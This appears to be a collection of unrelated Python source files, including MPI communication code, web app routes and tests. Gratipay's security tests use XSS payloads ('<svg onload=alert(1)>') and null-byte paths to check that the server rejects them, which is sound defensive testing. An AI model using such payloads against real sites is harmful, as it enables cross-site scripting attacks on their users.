self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testFallbackWithoutWidgets(self):
""" Test fallback to None """
rf = S3ReusableField("test", "integer")
# Standard fallback
field = rf()
self.assertEqual(field.widget, None)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, None)
# Alternative
self.assertRaises(NameError, rf, widget="alternative")
# Override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# =============================================================================
def run_suite(*test_classes):
""" Run the test suite """
loader = unittest.TestLoader()
suite = unittest.TestSuite()
for test_class in test_classes:
tests = loader.loadTestsFromTestCase(test_class)
suite.addTests(tests)
if suite is not None:
unittest.TextTestRunner(verbosity=2).run(suite)
return
if __name__ == "__main__":
run_suite(
S3RepresentTests,
S3ExtractLazyFKRepresentationTests,
S3ExportLazyFKRepresentationTests,
S3ReusableFieldTests,
)
# END ========================================================================
|
gnarula/eden_deployment
|
modules/unit_tests/s3/s3fields.py
|
Python
|
mit
| 47,235
| 0.001651
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from argparse import ArgumentParser
from .core import Core
def getopt(argv):
parser = ArgumentParser(description='Another webui for youtube-dl')
parser.add_argument('-c', '--config', metavar="CONFIG_FILE", help="config file")
parser.add_argument('--host', metavar="ADDR", help="the address server listens on")
parser.add_argument('--port', metavar="PORT", help="the port server listens on")
return vars(parser.parse_args())
def main(argv=None):
from os import getpid
print("pid is {}".format(getpid()))
print("-----------------------------------")
cmd_args = getopt(argv)
core = Core(cmd_args=cmd_args)
core.start()
|
d0u9/youtube-dl-webui
|
youtube_dl_webui/__init__.py
|
Python
|
gpl-2.0
| 755
| 0.005298
|
import mpi4py
import numpy
import chainer
import chainer.backends
import chainer.utils
from chainer.utils import collections_abc
from chainermn.communicators import _communication_utility
from chainermn.communicators._communication_utility import chunked_bcast_obj
from chainermn.communicators import _memory_utility
from chainermn.communicators import communicator_base
_dtype_mpi_type = {
# see the definition of mpi4py.MPI._typedict (in mpi4py/MPI/typemap.pxi)
numpy.dtype(numpy.int32): mpi4py.MPI._typedict['i'],
numpy.dtype(numpy.int64): mpi4py.MPI._typedict['l'],
numpy.dtype(numpy.float16): mpi4py.MPI._typedict['f'],
numpy.dtype(numpy.float32): mpi4py.MPI._typedict['f'],
numpy.dtype(numpy.float64): mpi4py.MPI._typedict['d'],
}
def _check_dtype(caller, msgtype):
dtype = msgtype.dtype
if dtype not in _dtype_mpi_type.keys():
raise TypeError(
'{} does not support dtype {}'.format(caller, dtype))
def _check_dtypes_are_same(msgtypes):
dtypes = [msgtype.dtype for msgtype in msgtypes]
if any(dtypes[0] != dtype for dtype in dtypes):
raise TypeError('all dtypes must be the same')
def _is_numpy_array(array):
return isinstance(array, numpy.ndarray)
def _is_cupy_array(array):
return chainer.backend.get_array_module(array) is not numpy
def _cnt_to_dsp(cnt):
"""Utility to convert length array to cumulative array."""
return [0] + numpy.cumsum(cnt)[:-1].tolist()
def _get_mpi_type(msgtype):
dtype = msgtype.dtype
if dtype not in _dtype_mpi_type.keys():
raise TypeError(
'dtype {} is not supported by MpiCommunicator'.format(dtype))
return _dtype_mpi_type[dtype]
class _MessageType(object):
def __init__(self, obj):
if _is_numpy_array(obj) or _is_cupy_array(obj):
self.is_host = _is_numpy_array(obj)
self.is_tuple = False
self.narr = 1
self.ndims = [obj.ndim]
self.shapes = [obj.shape]
self.dtype = obj.dtype
elif isinstance(obj, collections_abc.Iterable):
if all(map(_is_numpy_array, obj)):
self.is_host = True
elif all(map(_is_cupy_array, obj)):
self.is_host = False
else:
raise ValueError(
'All message objects must be either numpy or cupy arrays.')
self.is_tuple = True
self.narr = len(obj)
self.ndims = [x.ndim for x in obj]
self.shapes = [x.shape for x in obj]
dtypes = [x.dtype for x in obj]
if not all(dtype == dtypes[0] for dtype in dtypes):
raise TypeError(
'Message objects must be the same dtype')
self.dtype = dtypes[0]
else:
raise TypeError(
'Message object must be numpy/cupy array or its tuple.')
def get_array_module(self):
if self.is_host:
return numpy
else:
import cupy
return cupy
class MpiCommunicatorBase(communicator_base.CommunicatorBase):
'''MpiCommunicatorBase
Implementation of communicator interface defined by
:class:`CommunicatorBase`. This communicator assumes MPI4py and
all ChainerMN processes are invoked by ``mpirun`` (``mpiexec``)
command. Although this lacks several important methods such as
``multi_node_mean_grad`` to be impelmented with speficic algorithm. See
hierarcical communicator or pure_nccl communicator for example.
'''
def __init__(self, mpi_comm):
self.mpi_comm = mpi_comm
self._init_ranks()
@property
def rank(self):
return self.mpi_comm.rank
@property
def size(self):
return self.mpi_comm.size
@property
def intra_rank(self):
return self._intra_rank
@property
def intra_size(self):
return self._intra_size
@property
def inter_rank(self):
return self._inter_rank
@property
def inter_size(self):
return self._inter_size
def split(self, color, key):
return self.__class__(mpi_comm=self.mpi_comm.Split(color, key))
def alltoall(self, xs):
"""A primitive of inter-process all-to-all function.
This method tries to invoke all-to-all communication within the
communicator. All processes in the communicator are expected to
invoke ``alltoall()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``xs`` is numpy array, the returned array will also be allocated
as numpy array. Additionally, when ``xs`` is cupy array, the returned
array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
xs (tuple of numpy/cupy array)
Returns:
ys (tuple of numpy/cupy array):
Received arrays. The length of tuple equals to
the communicator size.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.alltoall')
if len(xs) != self.size:
raise ValueError(
'The length of data must be same as communicator size.')
# Type check.
msgtypes = [_MessageType(x) for x in xs]
for msgtype in msgtypes:
_check_dtype('alltoall', msgtype)
_check_dtypes_are_same(msgtypes)
send_msgtype = msgtypes[0]
msgtypes = self.mpi_comm.alltoall(msgtypes)
_check_dtypes_are_same(msgtypes)
recv_msgtype = msgtypes[0]
# Collective communication.
slens = [x.size for x in xs]
xp = chainer.backend.get_array_module(*xs)
sbuf = xp.hstack([x.reshape(-1) for x in xs])
shapes = [msgtype.shapes[0] for msgtype in msgtypes]
rlens = [chainer.utils.size_of_shape(s) for s in shapes]
rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
if xp is not numpy:
sbuf = _memory_utility.get_device_memory_pointer(sbuf)
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Alltoallv(
[sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(send_msgtype)],
[_memory_utility.get_device_memory_pointer(rbuf),
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(recv_msgtype)])
ys = [rbuf[i:i + l].reshape(s)
for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
return tuple(ys)
def send(self, data, dest, tag):
"""A primitive for inter-process transmitter.
This method sends numpy-array to target process.
The target process is expected to invoke ``recv()``.
This method relies on mpi4py fast communication optimized for
numpy arrays, which discards any information attached to
chainer.Variable objects. Please be sure.
Args:
data: data to be sent (tuple, list or raw numpy/cupy array)
dest (int): Target process specifier.
tag (int): Message ID (MPI feature).
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.send')
msgtype = _MessageType(data)
_check_dtype('send', msgtype)
"""We use ssend() instead of send() to pass unittests.
If we don't use it, an error occurs in
test_point_to_point_communication.py
when using MVAPICH2-2.2 and GPUs.
"""
self.mpi_comm.ssend(msgtype, dest=dest, tag=tag)
# Type check.
if not msgtype.is_tuple:
data = [data]
for array in data:
if numpy.float16 == array.dtype:
array = array.astype(numpy.float32)
if chainer.backend.get_array_module(array) is not numpy:
chainer.cuda.Stream.null.synchronize()
array = (_memory_utility.get_device_memory_pointer(array),
_get_mpi_type(msgtype))
else:
array = numpy.ascontiguousarray(array)
"""We use Ssend() for the same reason as using ssend()."""
self.mpi_comm.Ssend(array, dest=dest, tag=tag)
def recv(self, source, tag):
"""A primitive of inter-process receiver.
This method tries to receive numpy-array from target process.
The target process is expected to invoke ``send()``.
This method relies on mpi4py fast communication optimized for
numpy arrays, which discards any information attached to
chainer.Variable objects. Please be sure.
If the corresponding ``send()`` is invoked with cupy array,
the returned array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
source (int): Target process specifier.
tag (int): Message ID (MPI feature).
Returns:
data (tuple of numpy/cupy array or numpy/cupy array):
Received data. If ``send()`` is invoked with tuple data,
it is also tuple. Otherwise, it is a vanilla numpy/cupy array.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.recv')
msgtype = self.mpi_comm.recv(source=source, tag=tag)
xp = msgtype.get_array_module()
if numpy.float16 == msgtype.dtype:
comm_dtype = numpy.float32
else:
comm_dtype = msgtype.dtype
if msgtype.is_tuple:
msg = []
for shape in msgtype.shapes:
buf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=comm_dtype)
rtype = _get_mpi_type(msgtype)
self.mpi_comm.Recv(
_memory_utility.array_to_buffer_object(buf, rtype),
source=source, tag=tag)
if numpy.float16 == msgtype.dtype:
buf = buf.astype(numpy.float16)
msg.append(buf.reshape(shape))
return tuple(msg)
else:
assert len(msgtype.shapes) == 1
shape = msgtype.shapes[0]
buf = xp.empty([chainer.utils.size_of_shape(shape)],
dtype=comm_dtype)
rtype = _get_mpi_type(msgtype)
self.mpi_comm.Recv(
_memory_utility.array_to_buffer_object(buf, rtype),
source=source, tag=tag)
if numpy.float16 == msgtype.dtype:
buf = buf.astype(numpy.float16)
return buf.reshape(shape)
def bcast(self, x, root=0):
"""A primitive of inter-process broadcast communication.
This method tries to invoke broadcast communication within the
communicator. All processes in the communicator are expected to
invoke ``broadcast()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``bcast()`` is invoked with cupy array in the root process,
the returned array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
x (numpy/cupy array): Array to be broadcasted.
root (int): Rank of root process.
Returns:
ys (tuple of numpy/cupy array): Received arrays.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.bcast')
is_master = self.mpi_comm.rank == root
if is_master:
msgtype = _MessageType(x)
_check_dtype('bcast', msgtype)
if msgtype.is_tuple:
raise TypeError('Tuple data cannot be broadcasted')
msgtype = self.mpi_comm.bcast(msgtype, root)
shape = msgtype.shapes[0]
buf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
self.mpi_comm.Bcast(buf, root)
return x
else:
msgtype = self.mpi_comm.bcast(None, root)
xp = msgtype.get_array_module()
shape = msgtype.shapes[0]
buf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
buftype = _get_mpi_type(msgtype)
self.mpi_comm.Bcast(
_memory_utility.array_to_buffer_object(buf, buftype),
root)
return buf.reshape(shape)
def gather(self, x, root=0):
"""A primitive of inter-process gather communication.
This method tries to invoke gather communication within the
communicator. All processes in the communicator are expected to
invoke ``gather()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``x`` is numpy array, the received data will also be allocated
as numpy array. Additionally, when ``x`` is cupy array, the returned
array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
x (numpy/cupy array): Array to be gathered.
root (int): Rank of root process.
Returns:
ys (tuple of numpy/cupy array):
Received arrays. ``None`` for non-root processes.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.gather')
is_master = self.mpi_comm.rank == root
msgtype = _MessageType(x)
_check_dtype('gather', msgtype)
msgtypes = self.mpi_comm.gather(msgtype, root)
if is_master:
_check_dtypes_are_same(msgtypes)
for msgtype in msgtypes:
if msgtype.is_tuple:
raise TypeError('gather cannot handle tuple data')
assert len(msgtype.shapes) == 1
xp = chainer.backend.get_array_module(x)
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
shapes = [mty.shapes[0] for mty in msgtypes]
rlens = [chainer.utils.size_of_shape(s) for s in shapes]
rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
if xp is not numpy:
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Gatherv(
sbuf,
[_memory_utility.get_device_memory_pointer(rbuf),
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(msgtype)],
root)
ys = [rbuf[i:i + l].reshape(s)
for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
return tuple(ys)
else:
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
self.mpi_comm.Gatherv(sbuf, None, root)
return None
def allgather(self, x):
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.allgather')
msgtype = _MessageType(x)
_check_dtype('allgather', msgtype)
msgtypes = self.mpi_comm.allgather(msgtype)
_check_dtypes_are_same(msgtypes)
# Type check.
for msgtype in msgtypes:
if msgtype.is_tuple:
raise TypeError('allgather cannot handle tuple data')
assert len(msgtype.shapes) == 1
# Collective communication.
xp = chainer.backend.get_array_module(x)
shapes = [msgtype.shapes[0] for msgtype in msgtypes]
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
rlens = [chainer.utils.size_of_shape(s) for s in shapes]
rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
if xp is not numpy:
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Allgatherv(
sbuf,
[_memory_utility.get_device_memory_pointer(rbuf),
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(msgtype)])
ys = [rbuf[i:i + l].reshape(s)
for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
return tuple(ys)
def allreduce(self, x):
"""A primitive of inter-process allreduce communication.
This method tries to invoke allreduce communication within the
communicator. All processes in the communicator are expected to
invoke ``allreduce()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
Note that this method can only handle the same shapes of data
over all processes, and cannot handle tuple data.
If ``x`` is numpy array, the received data will also be allocated
as numpy array. Additionally, when ``x`` is cupy array, the returned
array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
x (numpy/cupy array): An array to apply allreduce operation.
Returns:
ys (numpy/cupy array): An array that allreduce (currently SUM only)
has been applied.
"""
msgtype = _MessageType(x)
_check_dtype('allreduce', msgtype)
if msgtype.is_tuple:
raise TypeError('allreduce cannot handle tuple data')
xp = chainer.backend.get_array_module(x)
# TODO(kuenishi): do we check all messages have same shape and dims?
# Source buffer
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
# Destination buffer and its object
shape = msgtype.shapes[0]
dbuf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
dbuf_buffer_obj = _memory_utility.array_to_buffer_object(
dbuf, _get_mpi_type(msgtype))
self.mpi_comm.Allreduce(sbuf, dbuf_buffer_obj)
return dbuf.reshape(shape)
def scatter(self, xs, root=0):
"""A primitive of inter-process scatter communication.
This method tries to invoke scatter communication within the
communicator. All processes in the communicator are expected to
invoke ``scatter()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``xs`` is tuple, each element is send to different processes.
The length of the tuple must be the same as the communicator size.
If ``xs`` is ``numpy.ndarrray``, it is splitted with the first
axis and sent to different processes. For slave processes, ``xs``
is allowed to be any value (will be ignored).
If ``scatter()`` is invoked with cupy array in the root process,
the returned array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
xs (tuple of numpy/cupy array): Arrays to be scattered.
root (int): Rank of root process.
Returns:
ys (numpy/cupy array): Received arrays.
"""
chainer.utils.experimental(
'chainermn.communicators.CommunicatorBase.scatter')
is_master = self.mpi_comm.rank == root
if is_master:
# Type check.
msgtype = _MessageType(xs)
_check_dtype('scatter', msgtype)
if msgtype.is_tuple:
if len(msgtype.shapes) != self.size:
raise ValueError(
'the length of xs must be consistent '
'with communicator size')
xp = chainer.backend.get_array_module(*xs)
msgtype = tuple([_MessageType(x) for x in xs])
shapes = [mty.shapes[0] for mty in msgtype]
# concatenate([x.reshape(-1) ... ], axis=0) will fail
xs = xp.concatenate([x.reshape(1, -1) for x in xs], axis=1)
else:
assert len(msgtype.shapes) == 1
if msgtype.shapes[0][0] != self.mpi_comm.size:
raise ValueError(
'scatter received inconsistent number of inputs '
'with communicator size')
xp = chainer.backend.get_array_module(xs)
msgtype = tuple([_MessageType(xs[0])
for _ in range(self.size)])
shapes = [xs.shape[1:] for _ in range(self.size)]
msgtype = self.mpi_comm.scatter(msgtype, root)
shape = msgtype.shapes[0]
# Collective communication.
slens = [chainer.utils.size_of_shape(s) for s in shapes]
sbuf = _memory_utility.get_device_memory_pointer(xs)
rbuf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
rtype = _get_mpi_type(msgtype)
if xp is not numpy:
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Scatterv(
[sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(msgtype)],
_memory_utility.array_to_buffer_object(rbuf, rtype), root)
return rbuf.reshape(shape)
else: # slave processes
msgtypes = self.mpi_comm.scatter(None, root)
xp = msgtypes.get_array_module()
shape = msgtypes.shapes[0]
rbuf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtypes.dtype)
rtype = _get_mpi_type(msgtypes)
self.mpi_comm.Scatterv(
None,
_memory_utility.array_to_buffer_object(rbuf, rtype),
root)
return rbuf.reshape(shape)
# Objects
def send_obj(self, obj, dest, tag=0):
self.mpi_comm.send(obj, dest=dest, tag=tag)
def recv_obj(self, source, status=None, tag=mpi4py.MPI.ANY_TAG):
return self.mpi_comm.recv(source=source, status=status, tag=tag)
def bcast_obj(self, obj, max_buf_len=256 * 1024 * 1024, root=0):
return chunked_bcast_obj(obj, self.mpi_comm,
max_buf_len=max_buf_len,
root=root)
def gather_obj(self, obj, root=0):
return self.mpi_comm.gather(obj, root=root)
def allreduce_obj(self, obj):
# Summation by default
return self.mpi_comm.allreduce(obj)
def bcast_data(self, model):
for _, param in sorted(model.namedparams()):
if param.data is not None:
data = param.data
is_float16 = param.data.dtype == numpy.float16
if is_float16:
data = data.astype(numpy.float32)
buf = _memory_utility.array_to_buffer_object(data)
self.mpi_comm.Bcast(buf)
if is_float16:
param.data = data.astype(numpy.float16)
# Private methods
def _init_ranks(self):
my_ranks = _communication_utility.init_ranks(self.mpi_comm)
assert my_ranks[0] == self.mpi_comm.rank
self._intra_rank = my_ranks[1]
self._intra_size = my_ranks[2]
self._inter_rank = my_ranks[3]
self._inter_size = my_ranks[4]
def _check_ready_to_allreduce(self, array_a, array_b):
my_shapes = ((None if array_a is None else array_a.shape,
None if array_a is None else array_a.dtype),
array_b.shape,
array_b.dtype)
all_shapes = self.gather_obj((self.rank, my_shapes))
if self.rank == 0:
for rank, shapes in all_shapes:
if my_shapes != shapes:
raise ValueError('Shape does not match: {}'
' at rank 0 while {} at rank {}'
.format(my_shapes, shapes, rank))
def _ensure_all_finite(self, array):
xp = chainer.backend.get_array_module(array)
if not xp.isfinite(array).all():
raise ValueError('Parameters diverged after allreduce.')
def _multi_node_mean(self, sendbuf, recvbuf):
"""Compute mean of each element on each processes.
The function compute mean of each element in ``sendbuf`` on each
processes. The result is stored in ``recvbuf``.
If ``sendbuf`` is ``None``, the function compute mean of each element
in ``recvbuf`` on each processes and replaces ``recvbuf` with the
computed mean.
Args:
sendbuf (numpy/cupy array): Input arrays.
recvbuf (numpy/cupy array): Output arrays.
"""
if chainer.is_debug():
self._check_ready_to_allreduce(sendbuf, recvbuf)
is_float16 = recvbuf.dtype == numpy.float16
if sendbuf is None:
buffer_a = mpi4py.MPI.IN_PLACE
elif is_float16:
assert sendbuf.dtype == recvbuf.dtype
buffer_a = _memory_utility.array_to_buffer_object(
sendbuf.astype(numpy.float32))
else:
buffer_a = _memory_utility.array_to_buffer_object(sendbuf)
if is_float16:
array_b32 = recvbuf.astype(numpy.float32)
else:
array_b32 = recvbuf
buffer_b = _memory_utility.array_to_buffer_object(array_b32)
self.mpi_comm.Allreduce(buffer_a, buffer_b)
if is_float16:
xp = chainer.backend.get_array_module(recvbuf)
xp.copyto(recvbuf, array_b32.astype(numpy.float16), casting='no')
recvbuf *= 1.0 / self.mpi_comm.size
if chainer.is_debug():
self._ensure_all_finite(recvbuf)
|
okuta/chainer
|
chainermn/communicators/mpi_communicator_base.py
|
Python
|
mit
| 26,362
| 0
|
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
import datetime
from aspen import Response
from aspen.http.request import Request
from base64 import urlsafe_b64decode
from cryptography.fernet import Fernet, InvalidToken
from gratipay import security
from gratipay.models.participant import Identity
from gratipay.security.crypto import EncryptingPacker
from gratipay.testing import Harness
from pytest import raises
class RejectNullBytesInURI(Harness):
def test_filters_path(self):
assert self.client.GxT('/f%00/').code == 400
def test_filters_querystring(self):
assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400
def test_protects_against_reflected_xss(self):
self.make_package()
assert self.client.GET('/on/npm/foo').code == 200
assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400
assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi
class OnlyAllowCertainMethodsTests(Harness):
def test_is_installed_properly(self):
assert self.client.hxt('TRaCE', '/').code == 405
def test_allows_certain_methods(self):
for allowed in ('GEt', 'HEaD', 'PosT'):
request = Request(allowed)
assert security.only_allow_certain_methods(request) is None
def test_disallows_a_bunch_of_other_stuff(self):
for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'):
request = Request(disallowed)
response = raises(Response, security.only_allow_certain_methods, request).value
assert response.code == 405
def test_doesnt_choke_error_handling(self):
assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405
def test_prevents_csrf_from_choking(self):
assert self.client.PxST('/assets/gratipay.css').code == 405
class AddHeadersToResponseTests(Harness):
def test_sets_x_frame_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Frame-Options'] == 'SAMEORIGIN'
def test_sets_x_content_type_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Content-Type-Options'] == 'nosniff'
def test_sets_x_xss_protection(self):
headers = self.client.GET('/about/').headers
assert headers['X-XSS-Protection'] == '1; mode=block'
def test_sets_referrer_policy(self):
headers = self.client.GET('/about/').headers
assert headers['Referrer-Policy'] == \
'no-referrer-when-downgrade, strict-origin-when-cross-origin'
def test_sets_strict_transport_security(self):
headers = self.client.GET('/about/').headers
assert headers['strict-transport-security'] == 'max-age=31536000'
def test_doesnt_set_content_security_policy_by_default(self):
assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers
def test_sets_content_security_policy(self):
with self.setenv(CSP_REPORT_URI='http://cheese/'):
headers = self.client.GET('/about/').headers
policy = (
"default-src 'self';"
"script-src 'self' assets.gratipay.com 'unsafe-inline';"
"style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com"
" 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';"
"img-src *;"
"font-src 'self' assets.gratipay.com cloud.typography.com data:;"
"block-all-mixed-content;"
"report-uri http://cheese/;"
)
assert headers['content-security-policy-report-only'] == policy
class EncryptingPackerTests(Harness):
packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\
b'5TdyoJsll5nMAicg=='
def test_packs_encryptingly(self):
packed = Identity.encrypting_packer.pack({"foo": "bar"})
assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version
def test_unpacks_decryptingly(self):
assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_fails_to_unpack_old_data_with_a_new_key(self):
encrypting_packer = EncryptingPacker(Fernet.generate_key())
raises(InvalidToken, encrypting_packer.unpack, self.packed)
def test_can_unpack_if_old_key_is_provided(self):
old_key = str(self.client.website.env.crypto_keys)
encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key)
assert encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_leaks_timestamp_derp(self):
# https://github.com/pyca/cryptography/issues/2714
timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted!
assert datetime.datetime.fromtimestamp(timestamp).year == 2016
def test_demands_bytes(self):
raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer'))
raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
|
gratipay/gratipay.com
|
tests/py/test_security.py
|
Python
|
mit
| 5,176
| 0.002705
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.conf.urls import url
from .views import HomePageView, LeaderboardView, MiscView, Sign_upView
urlpatterns = [
url(r'^$', HomePageView.as_view(), name='home'),
url(r'^misc$', MiscView.as_view(), name='misc'),
url(r'^leaderboard$', LeaderboardView.as_view(), name='leaderboard'),
url(r'^login$', Sign_upView.as_view(), name='login'),
]
|
echopen/PRJ-medtec_sigproc
|
echopen-leaderboard/bootcamp/leaderboard/urls.py
|
Python
|
mit
| 466
| 0
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import pytak.call as call
import pytak.runners.tools as tools
from fakeapi import CreateTag
from fakeapi import GetInformationAboutYourself
from fakeapi import CreateAPost
new_request_body = {
"title" : "New Employee [XXXXX]",
"body" : "Please welcome our new employee. Pytak tag - [DDDD]",
"type" : "TEXT",
"permissions" : {
"principal" : {
"id" : "12345",
"resource" : "http://example.com/schema/1.0/user"
},
"permissionFlags" : {
"view" : "true",
"edit" : "false",
"comment" : "true",
"share" : "true",
"authorize" :"false"
}
},
"tags" : [ {"name" : "tag2" }, { "name" : "tag3" }, { "name" : "tag4" } ]
}
def test_randomize_text():
txt = "JSON value with [XXXX] and [DDDD]"
assert txt != call.randomize_text(txt)
def test_random_int_leght():
dig = call.__get_random_int(4)
assert len(str(dig)) == 4
def test_random_alphanum_leght():
alphnum = call.__get_random_alphanumeric(4)
assert len(alphnum) == 4
def test_api_object_request_body_creation():
ct = CreateTag()
ct2 = CreateTag(assign={'name':'first'})
assert ct.request_body == ct2.request_body
def test_api_object_request_body_manipulation_with_empty():
ct = CreateTag()
ct2 = CreateTag(assign={'name':'second'})
tools.form_request_body(ct2)
assert ct.request_body != ct2.request_body
def test_api_object_request_body_manipulation_with_change():
ct = CreateTag(assign={'name':'one'})
ct2 = CreateTag(assign={'name':'two'})
tools.form_request_body(ct2)
assert ct.request_body != ct2.request_body
def test_url_rewrite():
your_information = GetInformationAboutYourself() + "fields=id,screenName,fullName"
assert your_information.uri == "/api/muad/rest/users/@me?fields=id,screenName,fullName"
def test_request_body_rewrite():
CreateAPost() << new_request_body
def test_assign_randomization():
create_tag = CreateTag(assign={"name" : "pytak-[XXXX]"})
assert create_tag.assign != {"name" : "pytak-[XXXX]"}
def test_request_body_randomization():
create_post = CreateAPost() << new_request_body
print(create_post.request_body)
|
zlatozar/pytak
|
pytak/tests/call_test.py
|
Python
|
bsd-3-clause
| 2,316
| 0.018566
|
class Solution(object):
def containsNearbyAlmostDuplicate(self, nums, k, t):
"""
:type nums: List[int]
:type k: int
:type t: int
:rtype: bool
"""
if k < 1 or t < 0:
return False
dic = {}
t += 1
for i in range(len(nums)):
if i > k:
del dic[nums[i - k - 1] // t]
m = nums[i] // t
if m in dic:
return True
if m - 1 in dic and abs(nums[i] - dic[m - 1]) < t:
return True
if m + 1 in dic and abs(nums[i] - dic[m + 1]) < t:
return True
dic[m] = nums[i]
return False
test = Solution()
print(test.containsNearbyAlmostDuplicate([1, 3, 1], 1, 1))
|
rx2130/Leetcode
|
python/220 Contains Duplicate III.py
|
Python
|
apache-2.0
| 777
| 0.001287
|
"""Support for Wireless Sensor Tags."""
import logging
from requests.exceptions import ConnectTimeout, HTTPError
import voluptuous as vol
from wirelesstagpy import NotificationConfig as NC
from homeassistant import util
from homeassistant.const import (
ATTR_BATTERY_LEVEL,
ATTR_VOLTAGE,
CONF_PASSWORD,
CONF_USERNAME,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import dispatcher_send
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
# Strength of signal in dBm
ATTR_TAG_SIGNAL_STRENGTH = "signal_strength"
# Indicates if tag is out of range or not
ATTR_TAG_OUT_OF_RANGE = "out_of_range"
# Number in percents from max power of tag receiver
ATTR_TAG_POWER_CONSUMPTION = "power_consumption"
NOTIFICATION_ID = "wirelesstag_notification"
NOTIFICATION_TITLE = "Wireless Sensor Tag Setup"
DOMAIN = "wirelesstag"
DEFAULT_ENTITY_NAMESPACE = "wirelesstag"
# Template for signal - first parameter is tag_id,
# second, tag manager mac address
SIGNAL_TAG_UPDATE = "wirelesstag.tag_info_updated_{}_{}"
# Template for signal - tag_id, sensor type and
# tag manager mac address
SIGNAL_BINARY_EVENT_UPDATE = "wirelesstag.binary_event_updated_{}_{}_{}"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
}
)
},
extra=vol.ALLOW_EXTRA,
)
class WirelessTagPlatform:
"""Principal object to manage all registered in HA tags."""
def __init__(self, hass, api):
"""Designated initializer for wirelesstags platform."""
self.hass = hass
self.api = api
self.tags = {}
self._local_base_url = None
@property
